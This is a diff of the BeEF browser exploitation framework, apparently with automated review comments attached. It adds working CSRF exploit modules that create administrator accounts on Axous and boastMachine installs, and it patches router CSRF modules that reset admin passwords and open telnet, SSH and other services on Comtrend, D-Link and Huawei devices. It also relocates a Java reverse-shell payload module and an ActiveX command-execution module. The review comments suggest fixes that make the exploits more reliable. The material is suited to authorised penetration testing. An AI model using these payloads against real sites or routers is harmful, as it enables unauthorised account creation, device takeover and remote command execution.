+ var hw_icon = zombie_array[index]["hw_icon"];
+ var domain = zombie_array[index]["domain"];
+ var port = zombie_array[index]["port"];
+ var has_flash = zombie_array[index]["has_flash"];
+ var has_web_sockets = zombie_array[index]["has_web_sockets"];
+ var has_googlegears = zombie_array[index]["has_googlegears"];
+ var has_phonegap = zombie_array[index]["has_phonegap"];
+ var date_stamp = zombie_array[index]["date_stamp"];
+
+ text = "
";
+ text+= "
";
+ text+= "
";
+ text+= ip;
+
+ balloon_text = "IP: " + ip;
+ balloon_text+= "
Browser: " + browser_name + " " + browser_version;
+ balloon_text+= "
System: " + os_name;
+ balloon_text+= "
Hardware: " + hw_name;
+ balloon_text+= "
Domain: " + domain + ":" + port;
+ balloon_text+= "
Flash: " + has_flash;
+ balloon_text+= "
Web Sockets: " + has_web_sockets;
+ balloon_text+= "
Google Gears: " + has_googlegears;
+ balloon_text+= "
Phonegap API: " + has_phonegap;
+ balloon_text+= "
Date: " + date_stamp;
var new_zombie = {
- 'id' : index,
- 'ip' : zombie_array[index]["ip"],
- 'session' : zombie_array[index]["session"],
- 'text': text,
- 'check' : false,
- 'domain' : zombie_array[index]["domain"],
- 'port' : zombie_array[index]["port"]
+ 'id' : index,
+ 'ip' : ip,
+ 'session' : session,
+ 'text' : text,
+ 'balloon_text' : balloon_text,
+ 'check' : false,
+ 'domain' : domain,
+ 'port' : port
};
return new_zombie;
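Review bot: `text` and `balloon_text` are assigned without `var`, so both become implicit globals shared across every `zombieFactory` call; declare them locally with `var text = ...` and `var balloon_text = ...`. The function's closing brace lies outside the hunk.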
diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
index 5537ee34e..aa04f300f 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
@@ -36,6 +36,7 @@ zombiesTreeList = function(id) {
//the tree node that contains the list of online hooked browsers
this.online_hooked_browsers_treenode = this.root.appendChild(
new Ext.tree.TreeNode({
+ qtip: "Online hooked browsers",
text:'Online Browsers',
cls:'online-zombies-node',
expanded:true
@@ -45,6 +46,7 @@ zombiesTreeList = function(id) {
//the tree node that contains the list of offline hooked browsers
this.offline_hooked_browsers_treenode = this.root.appendChild(
new Ext.tree.TreeNode({
+ qtip: "Offline hooked browsers",
text:'Offline Browsers',
cls:'offline-zombies-node',
expanded:false
@@ -183,7 +185,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
*/
addZombie: function(hooked_browser, online, checkbox) {
var hb_id, mother_node, node;
-
+
if(online) {
hb_id = 'zombie-online-' + hooked_browser.session;
mother_node = this.online_hooked_browsers_treenode;
@@ -193,7 +195,9 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
}
var exists = this.getNodeById(hb_id);
if(exists) return;
-
+
+ hooked_browser.qtip = hooked_browser.balloon_text;
+
//save a new online HB
if(online && Ext.pluck(this.online_hooked_browsers_array, 'session').indexOf(hooked_browser.session)==-1) {
this.online_hooked_browsers_array.push(hooked_browser);
@@ -216,7 +220,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
//creates a new node for that hooked browser
node = new Ext.tree.TreeNode(hooked_browser);
-
+
//creates a sub-branch for that HB if necessary
mother_node = this.addSubFolder(mother_node, hooked_browser[this.tree_configuration['sub-branch']], checkbox);
@@ -253,6 +257,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
sub_folder_node = new Ext.tree.TreeNode({
id: 'sub-folder-'+folder,
text: folder,
+ qtip: "Browsers hooked on "+folder,
checked: ((checkbox) ? false : null),
type: this.tree_configuration["sub-branch"]
});
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index a896184cb..f810c042e 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -358,6 +358,21 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
+ # set and add the return values for the os name
+ hw_name = BD.get(self.targetsession, 'Hardware')
+ if not hw_name.nil?
+ encoded_hw_name = CGI.escapeHTML(hw_name)
+ encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
+
+ page_name_row = {
+ 'category' => 'Host',
+ 'data' => encoded_hw_name_hash,
+ 'from' => 'Initialization'
+ }
+
+ summary_grid_hash['results'].push(page_name_row) # add the row
+ end
+
# set and add the return values for the browser name
browser_name = BD.get(self.targetsession, 'BrowserName')
if not browser_name.nil?
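Review bot: The comment introducing the new block says `# set and add the return values for the os name`, copied from the block above, while the code reads the `'Hardware'` key; change it to `# set and add the return values for the hardware name` so the summary sections stay searchable. The rest of the block mirrors the modules.rb version and the later hunk uses the correctly cased `'HasPhonegap'` key.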
@@ -535,6 +550,21 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
+ # set and add the yes|no value for HasPhonegap
+ has_phonegap = BD.get(self.targetsession, 'HasPhonegap')
+ if not has_phonegap.nil?
+ encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
+ encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
+
+ page_name_row = {
+ 'category' => 'Browser',
+ 'data' => encoded_has_phonegap_hash,
+ 'from' => 'Initialization'
+ }
+
+ summary_grid_hash['results'].push(page_name_row) # add the row
+ end
+
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(self.targetsession, 'HasGoogleGears')
if not has_googlegears.nil?
diff --git a/extensions/evasion/evasion.rb b/extensions/evasion/evasion.rb
index b86cca957..aaf3019d9 100644
--- a/extensions/evasion/evasion.rb
+++ b/extensions/evasion/evasion.rb
@@ -37,10 +37,10 @@ module BeEF
#2. call the "execute" method of the ruby module, passing the input
#3. update the input in order that next technique will work on the pre-processed input.
if File.exists?("#{$root_dir}/extensions/evasion/obfuscation/#{technique}.rb")
- print_debug "[OBFUSCATION] Applying technique [#{technique}]"
klass = BeEF::Extension::Evasion.const_get(technique.capitalize).instance
is_bootstrap_needed = klass.need_bootstrap
if is_bootstrap_needed
+ print_debug "[OBFUSCATION] Adding bootstrapper for technique [#{technique}]"
@bootstrap += klass.get_bootstrap
end
end
diff --git a/extensions/proxy/api.rb b/extensions/proxy/api.rb
index 96c67d586..13cf8dadf 100644
--- a/extensions/proxy/api.rb
+++ b/extensions/proxy/api.rb
@@ -14,33 +14,33 @@
# limitations under the License.
#
module BeEF
-module Extension
-module Proxy
-module API
+ module Extension
+ module Proxy
+ module API
- module RegisterHttpHandler
+ module RegisterHttpHandler
- BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'pre_http_start')
- BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
-
- def self.pre_http_start(http_hook_server)
- config = BeEF::Core::Configuration.instance
- Thread.new{
- http_hook_server.semaphore.synchronize{
- BeEF::Extension::Proxy::Proxy.new
- }
- }
- print_success "HTTP Proxy: http://#{config.get('beef.extension.proxy.address')}:#{config.get('beef.extension.proxy.port')}"
+ BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'pre_http_start')
+ BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
+
+ def self.pre_http_start(http_hook_server)
+ config = BeEF::Core::Configuration.instance
+ Thread.new{
+ http_hook_server.semaphore.synchronize{
+ BeEF::Extension::Proxy::Proxy.new
+ }
+ }
+ print_info "HTTP Proxy: http://#{config.get('beef.extension.proxy.address')}:#{config.get('beef.extension.proxy.port')}"
+ end
+
+ def self.mount_handler(beef_server)
+ beef_server.mount('/proxy', BeEF::Extension::Requester::Handler)
+ end
+
+ end
+
+
+ end
end
-
- def self.mount_handler(beef_server)
- beef_server.mount('/proxy', BeEF::Extension::Requester::Handler)
- end
-
end
-
-
-end
-end
-end
end
diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
index b4a20fe33..3aa49f32f 100644
--- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
+++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
@@ -24,7 +24,7 @@ beef:
target:
working:
S:
- os: ["iPhone"]
+ os: ["iOS"]
not_working:
ALL:
os: ["All"]
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/command.js b/modules/exploits/axous_1_1_1_add_user_csrf/command.js
new file mode 100644
index 000000000..bfa12a6a6
--- /dev/null
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/command.js
@@ -0,0 +1,40 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+ var base = '<%= @base %>';
+ var username = '<%= @username %>';
+ var password = '<%= @password %>';
+ var email = '<%= @email %>';
+
+ var axous_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+ {'type':'hidden', 'name':'user_name', 'value':username},
+ {'type':'hidden', 'name':'new_passwd', 'value':password},
+ {'type':'hidden', 'name':'new_passwd1', 'value':password},
+ {'type':'hidden', 'name':'email', 'value':email},
+ {'type':'hidden', 'name':'dosubmit', 'value':'1'} ,
+ {'type':'hidden', 'name':'id', 'value':''},
+ {'type':'hidden', 'name':'action', 'value':'addnew'} ,
+ ]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(axous_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
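Review bot: The four option values at `var base = '<%= @base %>';` through `var email = '<%= @email %>';` are interpolated into single-quoted JS literals with no escaping, so a password or e-mail containing `'` (or a trailing `\`) breaks the whole `beef.execute` body and the module silently does nothing while still reporting `exploit attempted`. The cisco_collaboration module added in the same commit at least attempts to escape quotes, so the two should agree; the block form keeps the backslash literal, e.g. `var password = '<%= @password.gsub("'") { "\\'" } %>';` for each of the four. The input is operator-supplied, so this is a robustness rather than a trust-boundary issue, but it is the first thing a non-trivial password will hit. `cleanup` is also assigned as an implicit global and invoked through a string `setTimeout`; a closure `setTimeout(function() { document.body.removeChild(axous_iframe); }, 15000);` avoids both.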
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
new file mode 100644
index 000000000..4231dc7e8
--- /dev/null
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ axous_add_user_csrf:
+ enable: true
+ category: "Exploits"
+ name: "Axous <= 1.1.1 Add User CSRF"
+ description: "Attempts to add a user to an Axous <= 1.1.1 install (CVE-2012-2629)."
+ authors: ["bcoles", "Ivano Binetti"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
new file mode 100644
index 000000000..ba7f8e63e
--- /dev/null
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
@@ -0,0 +1,31 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Axous_add_user_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'base', 'ui_label' => 'Axous URL', 'value' => 'http://target/admin/administrators_add.php'},
+ { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
+ { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
+ { 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/command.js b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
new file mode 100644
index 000000000..7e312ae66
--- /dev/null
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
@@ -0,0 +1,41 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+ var base = '<%= @base %>';
+ var username = '<%= @username %>';
+ var password = '<%= @password %>';
+ var email = '<%= @email %>';
+
+ var boastmachine_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+ {'type':'hidden', 'name':'action', 'value':'add_user'},
+ {'type':'hidden', 'name':'do', 'value':'add'},
+ {'type':'hidden', 'name':'user_login', 'value':username},
+ {'type':'hidden', 'name':'user_pass', 'value':password},
+ {'type':'hidden', 'name':'user_name', 'value':username},
+ {'type':'hidden', 'name':'user_email', 'value':email},
+ {'type':'hidden', 'name':'blogs[]', 'value':'4'},
+ {'type':'hidden', 'name':'user_level', 'value':'4'},
+ ]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(boastmachine_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
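Review bot: `cleanup = function() {...}` followed by `setTimeout("cleanup()", 15000);` creates an implicit global on the hooked page and evaluates a string, and every module in this family (axous, virgin_superhub, spring) defines the same global `cleanup`, so two of them launched within the 15 s window overwrite each other and one iframe is never removed while the other's removal runs twice and throws on `removeChild`. A closure needs no global and no string evaluation: `setTimeout(function() { document.body.removeChild(boastmachine_iframe); }, 15000);`. The hard-coded `blogs[]` and `user_level` values of `'4'` are not exposed as options and are not explained; a one-line comment stating what level 4 is on boastMachine (presumably the highest privilege — confirm) would save the next reader a trip to the target's source.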
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
new file mode 100644
index 000000000..f754f84f7
--- /dev/null
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ boastmachine_add_user_csrf:
+ enable: true
+ category: "Exploits"
+ name: "boastMachine <= 3.1 Add User CSRF"
+ description: "Attempts to add a user to a boastMachine <= 3.1 install."
+ authors: ["bcoles", "Dr.NaNo"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
new file mode 100644
index 000000000..0fcdc068b
--- /dev/null
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
@@ -0,0 +1,31 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Boastmachine_add_user_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog'},
+ { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
+ { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
+ { 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/activex_command_execution/command.js b/modules/exploits/local_host/activex_command_execution/command.js
similarity index 100%
rename from modules/exploits/activex_command_execution/command.js
rename to modules/exploits/local_host/activex_command_execution/command.js
diff --git a/modules/exploits/activex_command_execution/config.yaml b/modules/exploits/local_host/activex_command_execution/config.yaml
similarity index 95%
rename from modules/exploits/activex_command_execution/config.yaml
rename to modules/exploits/local_host/activex_command_execution/config.yaml
index 1e0995937..0a4d45a45 100755
--- a/modules/exploits/activex_command_execution/config.yaml
+++ b/modules/exploits/local_host/activex_command_execution/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
activex_command_execution:
enable: true
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "ActiveX Command Execution"
description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.
The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled."
authors: ["bcoles"]
diff --git a/modules/exploits/activex_command_execution/module.rb b/modules/exploits/local_host/activex_command_execution/module.rb
similarity index 100%
rename from modules/exploits/activex_command_execution/module.rb
rename to modules/exploits/local_host/activex_command_execution/module.rb
diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.2.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar
similarity index 100%
rename from modules/exploits/java_payload/AppletReverseTCP-0.2.jar
rename to modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar
diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar
similarity index 100%
rename from modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar
rename to modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar
diff --git a/modules/exploits/java_payload/command.js b/modules/exploits/local_host/java_payload/command.js
similarity index 100%
rename from modules/exploits/java_payload/command.js
rename to modules/exploits/local_host/java_payload/command.js
diff --git a/modules/exploits/java_payload/config.yaml b/modules/exploits/local_host/java_payload/config.yaml
similarity index 96%
rename from modules/exploits/java_payload/config.yaml
rename to modules/exploits/local_host/java_payload/config.yaml
index 0d58413ba..651dedb7b 100755
--- a/modules/exploits/java_payload/config.yaml
+++ b/modules/exploits/local_host/java_payload/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
java_payload:
enable: true
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "Java Payload"
description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.
Before launching it, be sure to have the JavaPayload StagerHandler listening,
i.e.: java javapayload.handler.stager.StagerHandler <payload> <IP> <port> -- JSh
Windows Vista is not supported."
authors: ["antisnatchor"]
diff --git a/modules/exploits/java_payload/module.rb b/modules/exploits/local_host/java_payload/module.rb
similarity index 100%
rename from modules/exploits/java_payload/module.rb
rename to modules/exploits/local_host/java_payload/module.rb
diff --git a/modules/exploits/mozilla_nsiprocess_interface/command.js b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
similarity index 100%
rename from modules/exploits/mozilla_nsiprocess_interface/command.js
rename to modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
diff --git a/modules/exploits/mozilla_nsiprocess_interface/config.yaml b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
similarity index 96%
rename from modules/exploits/mozilla_nsiprocess_interface/config.yaml
rename to modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
index 7e1b71cd2..730bb4c79 100644
--- a/modules/exploits/mozilla_nsiprocess_interface/config.yaml
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
mozilla_nsiprocess_interface:
enable: false
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "Mozilla nsIProcess XPCOM Interface (Windows)"
description: "The nsIProcess XPCOM interface represents an executable process. JavaScript code with chrome privileges can use the nsIProcess interface to launch executable files. In this module, nsIProcess is combined with the Windows command prompt cmd.exe
Any XSS injection in a chrome privileged zone (e.g. typically in Firefox extensions) allows this module to execute arbitrary commands on the victim machine."
authors: ["wade", "bcoles", "roberto.suggi@security-assessment.com", "nick.freeman@security-assessment.com"]
diff --git a/modules/exploits/mozilla_nsiprocess_interface/module.rb b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
similarity index 100%
rename from modules/exploits/mozilla_nsiprocess_interface/module.rb
rename to modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
diff --git a/modules/exploits/safari_launch_app/command.js b/modules/exploits/local_host/safari_launch_app/command.js
similarity index 100%
rename from modules/exploits/safari_launch_app/command.js
rename to modules/exploits/local_host/safari_launch_app/command.js
diff --git a/modules/exploits/safari_launch_app/config.yaml b/modules/exploits/local_host/safari_launch_app/config.yaml
similarity index 95%
rename from modules/exploits/safari_launch_app/config.yaml
rename to modules/exploits/local_host/safari_launch_app/config.yaml
index ba9de7df2..13200a95d 100755
--- a/modules/exploits/safari_launch_app/config.yaml
+++ b/modules/exploits/local_host/safari_launch_app/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
safari_launch_app:
enable: true
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "Safari Launch App"
description: "Launch an application from the victim machine.
See CVE-2011-3230 for more details.
Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel."
authors: ["antisnatchor"]
diff --git a/modules/exploits/safari_launch_app/module.rb b/modules/exploits/local_host/safari_launch_app/module.rb
similarity index 100%
rename from modules/exploits/safari_launch_app/module.rb
rename to modules/exploits/local_host/safari_launch_app/module.rb
diff --git a/modules/exploits/window_mail_client_dos/command.js b/modules/exploits/local_host/window_mail_client_dos/command.js
similarity index 100%
rename from modules/exploits/window_mail_client_dos/command.js
rename to modules/exploits/local_host/window_mail_client_dos/command.js
diff --git a/modules/exploits/window_mail_client_dos/config.yaml b/modules/exploits/local_host/window_mail_client_dos/config.yaml
similarity index 96%
rename from modules/exploits/window_mail_client_dos/config.yaml
rename to modules/exploits/local_host/window_mail_client_dos/config.yaml
index 891f16919..25a643768 100644
--- a/modules/exploits/window_mail_client_dos/config.yaml
+++ b/modules/exploits/local_host/window_mail_client_dos/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
windows_mail_client_dos:
enable: true
- category: "Exploits"
+ category: ["Exploits", "Local Host"]
name: "Windows Mail Client DoS"
description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.
Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's also vulnerable on Windows 7 SP2).
The protocol handler used will be: nntp."
authors: ["bcoles"]
diff --git a/modules/exploits/window_mail_client_dos/module.rb b/modules/exploits/local_host/window_mail_client_dos/module.rb
similarity index 100%
rename from modules/exploits/window_mail_client_dos/module.rb
rename to modules/exploits/local_host/window_mail_client_dos/module.rb
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js
index fdbedec46..d713b6b06 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js
@@ -18,12 +18,12 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
- ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+ ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
- form.setAttribute('action', gateway + "/password.cgi");
+ form.setAttribute('action', gateway + "password.cgi");
form.setAttribute('method', 'post');
var input = null;
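Review bot: Dropping the leading `/` from `scsrvcntr.cmd` and `password.cgi` makes the module depend on the operator leaving a trailing `/` on the `base` option; without it the requests go to `http://192.168.1.1scsrvcntr.cmd`, which fails silently behind an invisible iframe while the module still reports success. Normalising once, right after the `gateway` declaration that sits just above this hunk, removes the dependency: `if (gateway.charAt(gateway.length - 1) != '/') gateway += '/';`. The `var input = null;` line and the rest of the form construction continue outside the hunk.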
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js
index b6cc7ab28..afe248983 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js
@@ -18,7 +18,7 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
- ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+ ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
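Review bot: Only the first iframe's URL had its leading `/` removed; the unchanged second request at `ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?...')` still prepends `/`, so with the trailing-slash `base` the first line now assumes, the password change is sent to `//password.cgi` and only the service-control request is well-formed. The two lines should be brought into agreement: `ct5367_iframe2.setAttribute('src', gateway+'password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);`. The variables are also still named `ct5367_*` in the CT5624 module, which looks like a copy-paste leftover and makes the two modules hard to tell apart in the browser console.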
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js
index ae1c98e23..f25c89a5b 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/command.js
+++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js
@@ -17,7 +17,7 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
- var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST",
+ var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
{'type':'hidden', 'name':'security:settings/password', 'value':passwd},
diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js
index a749117a8..bfe98e957 100644
--- a/modules/exploits/router/huawei_smartax_mt880/command.js
+++ b/modules/exploits/router/huawei_smartax_mt880/command.js
@@ -19,7 +19,7 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
- huawei_smartax_mt880_iframe.setAttribute('src', gateway+"/Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
+ huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js
new file mode 100644
index 000000000..fb0ed4ca4
--- /dev/null
+++ b/modules/exploits/router/virgin_superhub_csrf/command.js
@@ -0,0 +1,47 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
